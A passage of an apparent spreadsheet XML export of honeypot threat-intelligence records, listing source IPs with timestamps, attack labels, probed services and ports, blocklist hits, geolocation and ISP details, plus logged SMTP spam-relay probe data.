12:04:49 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 28 Mar 2025 02:43:15 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '94.131.97.67_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 28 Mar 2025 09:51:26 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d90:d4a6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1338"/>
    <x v="1338"/>
    <s v="NA&amp;&amp;114-35-124-116.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-17T12:14:26"/>
    <d v="2025-03-08T12:06:17"/>
    <d v="2025-04-17T12:14:26"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7223:7c74"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1339"/>
    <x v="1339"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:14:11"/>
    <d v="2025-04-17T12:12:57"/>
    <d v="2025-04-17T12:14:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Queenstown Estate)"/>
    <s v="1880252"/>
    <s v="139963"/>
    <s v="1.29618"/>
    <s v="103.791"/>
    <s v="53813"/>
    <s v="ZSCALER, INC."/>
    <s v="ZSCALER, INC."/>
    <s v="hosting"/>
    <s v="Zscaler, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:88e2:eaa9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1340"/>
    <x v="1340"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:11:38"/>
    <d v="2025-04-17T09:25:25"/>
    <d v="2025-04-17T12:11:38"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.23406"/>
    <s v="106.824"/>
    <s v="23700"/>
    <s v="Linknet-Fastnet ASN"/>
    <s v="Linknet-Fastnet ASN"/>
    <s v="business"/>
    <s v="FastNet512"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7688:e2e6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1341"/>
    <x v="1341"/>
    <s v="c-174-50-43-173.hsd1.la.comcast.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:11:23"/>
    <d v="2025-04-16T03:26:46"/>
    <d v="2025-04-17T12:11:23"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="LA"/>
    <s v="Louisiana"/>
    <s v="Caddo"/>
    <s v="Shreveport"/>
    <s v="4341513"/>
    <s v="71150"/>
    <s v="32.5252"/>
    <s v="-93.7502"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ae32:2bad"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1342"/>
    <x v="1342"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:09:24"/>
    <d v="2023-07-25T05:41:45"/>
    <d v="2025-04-17T12:09:24"/>
    <n v="848"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;26101&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Ratchathewi"/>
    <s v="Ratchathewi (Khwaeng Samsen Nai)"/>
    <s v="7026885"/>
    <s v="NA"/>
    <s v="13.7683"/>
    <s v="100.54"/>
    <s v="45458"/>
    <s v="ADVANCED WIRELESS NETWORK COMPANY LIMITED"/>
    <s v="Advanced Wireless Network Company Limited"/>
    <s v="business"/>
    <s v="SattahipCommercialPierNavalBase by AWN"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,52328)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,52690)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,52323)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,52965)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,55455)}&amp;&amp;{Data_SMB:Incoming connection (49.229.36.98,56120)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31e5:2462"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1343"/>
    <x v="1343"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:06:53"/>
    <d v="2025-03-03T09:43:36"/>
    <d v="2025-04-17T12:06:53"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="2007-08-08"/>
    <s v="IPxDSL-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_SMB:Incoming connection (118.70.220.72,53096)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (118.70.220.72,57907)}&amp;&amp;{Data_SMB:Incoming connection (118.70.220.72,61889)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7646:dc48"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1344"/>
    <x v="1344"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T11:52:05"/>
    <d v="2023-07-25T11:20:33"/>
    <d v="2025-04-17T11:52:05"/>
    <n v="1282"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_SSH_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;80&amp;&amp;1080&amp;&amp;443&amp;&amp;5900&amp;&amp;9100&amp;&amp;389&amp;&amp;24061&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.1967"/>
    <s v="106.822"/>
    <s v="17995"/>
    <s v="PT iForte Global Internet"/>
    <s v="PT iForte Global Internet"/>
    <s v="business"/>
    <s v="Solusinet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,61467)}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,62044)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,53807)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,56930)}&amp;&amp;{Data_SMB:Incoming connection (103.165.211.138,57587)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a5:d38a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1345"/>
    <x v="1345"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T11:51:16"/>
    <d v="2025-04-14T20:38:40"/>
    <d v="2025-04-17T11:51:16"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="MD"/>
    <s v="Moldova"/>
    <s v="CU"/>
    <s v="Chișinău Municipality"/>
    <s v="NA"/>
    <s v="Chisinau"/>
    <s v="618426"/>
    <s v="MD-2000"/>
    <s v="47.0617"/>
    <s v="28.9442"/>
    <s v="8926"/>
    <s v="Moldtelecom SA"/>
    <s v="JSC MOLDTELECOM SA"/>
    <s v="business"/>
    <s v="JSC Moldtelecom S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bcd4:db6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1346"/>
    <x v="1346"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T11:30:09"/>
    <d v="2025-04-17T10:55:15"/>
    <d v="2025-04-17T11:30:09"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:b2f7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1347"/>
    <x v="1347"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T11:18:35"/>
    <d v="2023-12-14T19:04:59"/>
    <d v="2025-04-17T11:18:35"/>
    <n v="38"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="389&amp;&amp;445&amp;&amp;35390&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="2004-09-21"/>
    <s v="CableLite"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.22,50125)}&amp;&amp;{Data_SMB:Incoming connection (202.83.19.22,50705)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca53:1316"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1348"/>
    <x v="1348"/>
    <s v="91.158.70.115.static.exetel.com.au&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T11:11:21"/>
    <d v="2025-04-16T18:14:00"/>
    <d v="2025-04-17T11:11:21"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="QLD"/>
    <s v="Queensland"/>
    <s v="Brisbane"/>
    <s v="Fortitude Valley"/>
    <s v="6943577"/>
    <s v="4006"/>
    <s v="-27.4539"/>
    <s v="153.033"/>
    <s v="10143"/>
    <s v="SUPERLOOP (AUSTRALIA) PTY LTD"/>
    <s v="EXETEL-Broadband"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7346:9e5b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1349"/>
    <x v="1349"/>
    <s v="NA&amp;&amp;bayarvrider.com"/>
    <x v="0"/>
    <d v="2025-04-17T11:10:14"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-17T11:10:14"/>
    <n v="126"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_DHCP_H6&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_DNS_H16&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;67&amp;&amp;3915&amp;&amp;53&amp;&amp;37102&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="02"/>
    <s v="Kedah"/>
    <s v="Pokok Sena"/>
    <s v="Kampong Bukit Tinggi"/>
    <s v="1770086"/>
    <s v="NA"/>
    <s v="6.2"/>
    <s v="100.433"/>
    <s v="45839"/>
    <s v="Shinjiru Technology Sdn Bhd"/>
    <s v="Shinjiru Technology Sdn Bhd"/>
    <s v="hosting"/>
    <s v="Shinjiru Technology Sdn Bhd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7cd9:fba4"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1350"/>
    <x v="1350"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T11:01:48"/>
    <d v="2025-04-17T11:01:48"/>
    <d v="2025-04-17T11:01:48"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="52"/>
    <s v="Tuscany"/>
    <s v="Florence"/>
    <s v="Florence"/>
    <s v="3176959"/>
    <s v="50123"/>
    <s v="43.7696"/>
    <s v="11.2558"/>
    <s v="3269"/>
    <s v="ASN-IBSNAZ"/>
    <s v="Interbusiness"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4f12:122c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1351"/>
    <x v="1351"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T10:59:17"/>
    <d v="2025-02-11T16:34:39"/>
    <d v="2025-04-17T10:59:17"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c4:b2c3"/>
    <s v="C-I_D"/>
